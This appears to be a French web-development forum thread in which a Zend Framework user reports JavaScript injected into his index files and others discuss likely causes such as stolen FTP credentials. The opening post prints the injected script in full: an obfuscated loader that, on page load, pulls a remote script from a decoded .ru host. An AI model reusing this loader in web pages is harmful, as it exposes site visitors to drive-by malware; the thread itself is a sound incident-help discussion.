Discussion :

[__fabrice]

Hello à tous,

Je développe un site avec ZF 1.9, et il y a eu un soucis sur le fichier index.php, du code a été ajouté je ne sais pas qui !!, voici :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
<script>/*GNU GPL*/ try{window.onload = function(){
var Nhbk5v835x5dq6 = document.createElement('script');
Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');
Nhbk5v835x5dq6.setAttribute('id', 'myscript1');
Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));
Nhbk5v835x5dq6.setAttribute('defer', 'defer');
document.body.appendChild(Nhbk5v835x5dq6);}}
catch(e) {}</script>

çà sent tres mauvais ce code là ... une idée sur ce problème ?
Merci
Fabrice

[sabotage]

Si le fichier est modifié, il y a de fortes chances qu'un virus soit présent sur ton serveur.

[__fabrice]

Oui, le fichier a été modifié, et ce code n'est pas sur mon serveur mais chez un hébergeur privé (Linux).... Dois je en changer ?

Fabrice

[sabotage]

Le virus peut techniquement venir de plein de choses : une faille de sécurité sur le serveur en est une, on pourrait aussi imaginer un virus sur ton logiciel FTP par exemple.

[__fabrice]

Je ne crois pas, j'ai un anti-virus + firewall mise à jour quotidiennement, et c'est un fichier en dehors du repository, que j'exporte par la suite (pas ce fichier).

Et l'erreur est apparue sans que j'intervienne.

Fabrice

[grunk]

Plutôt qu'un virus , je pencherais plus pour un deface de ton site afin de récupérer les infos de tes visiteurs.
Plusieurs cause possible :

- Un acces ftp bateau genre toto/toto
- Une faille quelconque sur ton site permettant à un pirate d'uploader un fichier et de l'executer
- Une sécurité insuffisante sur ton pc , keylogger , libre accès à ta machine ...

Un virus c'est quand même fort peu probable. D'une part un virus qui transiterais de windows à linux via un client ftp ca serait du jamais vu. Et d'autre part les virus ne vise généralement pas particumlièrement les pages web.

Dans tous les cas tu es bon pour un check compelt de ton site, des logs si tu y a accès et de la config de ton serveur si tu es sur un serveur dédié.

[__fabrice]

ok,
- le ftp a des chiffres et des lettres quelconque.
- j'ai vérifié mon pc de fond en comble

Donc, oui, y'a une faille je ne sais ou. Je n'ai pas acces au logs, mais le fai me dis que c'est ok (évidemment).

Merci
Fab.

[Thes32]

Salut,

tu devrais commencer par le signaler à ton Hébergeur puis voir si ça ne vient pas d'eux.

[__fabrice]

oui, je l'ai fait déjà, il me dis que tout va bien, dans les logs et tout et tout.

F.

[spawntux]

Bonjour,

Si ton hebergeur est free deja qu'il te dise que tout vas bien c'est assez etonnant, ensuite ton hebergeur ne controlera nullement l'integrité et le code source des tes script donc ne lui fait pas confiance, seul methode, reprendre ton code source.Module upload, traitrement des variables ...

Bien cordialement

[__fabrice]

c un hebergeur privé.

Pour le code, j'ai tout fait proprement, sans faille.

- j'ai changé le ftp
- les fichiers uploadé sont seulement des .jpg, et je filtre aussi la taille
- je fais de url rewriting donc pas de soucis de changement d'id ou autres dans les get , etc
- j'utilise uniquement ZF et phpThumbs (http://phpthumb.gxdlabs.com)

Pour le FAI, j'en sais trop rien...

Fabrice

[__fabrice]

la version de Zend est la derniere, en tout cas la 1.9. Celle de phpThumb aussi. Et php, php 5.2.x.

Je viens de m'apercevoir que ce n'est pas seulement le fichier index.php, mais tous les index.phtml !!!

F.

[matdevdev]

je viens de connaitre le même problème :
modification, via ftp je suppose, des fichiers contenant le mot index.
J'ai l'impression que le procédure a lieu quand je suis connecté en FTP sur le site sur lequel je bosse. Perso, j'utilise dream CSS4 comme client FTP.
je pense que le script ajouté permet de récupérer l'url du site (l'accès FTP seul ne donnant pas l'information) et qu'ensuite d'autre appli sont installé.

dans le script pour le paramètre src, en supprimant tous les caractères spéciaux on obtient une url :
.....msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

[__fabrice]

Hello,

Merci pour ces infos. Ce site ne me dis rien, surtout avec un .ru à la fin
Ma foi, je vais vérifier tout çà... et voir si çà se reproduit.

Fab

[Invité]

Bonjour,
Ce serait interessant que tu donnes même par MP si tu veux, l(URL de ton site, que ceux qui ont des techniques dans ce domaine aillent titiller la bête.

Cela ne peut qu'étre util !